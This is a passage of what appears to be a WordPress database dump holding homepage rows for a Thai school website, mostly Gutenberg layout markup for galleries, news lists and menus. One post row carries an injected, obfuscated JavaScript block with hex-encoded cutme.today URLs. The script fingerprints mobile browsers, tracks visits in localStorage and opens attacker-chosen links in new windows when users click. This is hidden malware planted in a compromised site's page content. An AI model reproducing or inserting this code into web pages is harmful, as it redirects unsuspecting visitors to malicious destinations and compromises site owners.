_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:17:09','2024-07-27 04:17:09','',14,'http://pakhaeng.ssk.in.th/?p=89',0,'revision','',0),
(90,1,'2024-07-27 11:18:05','2024-07-27 04:18:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table 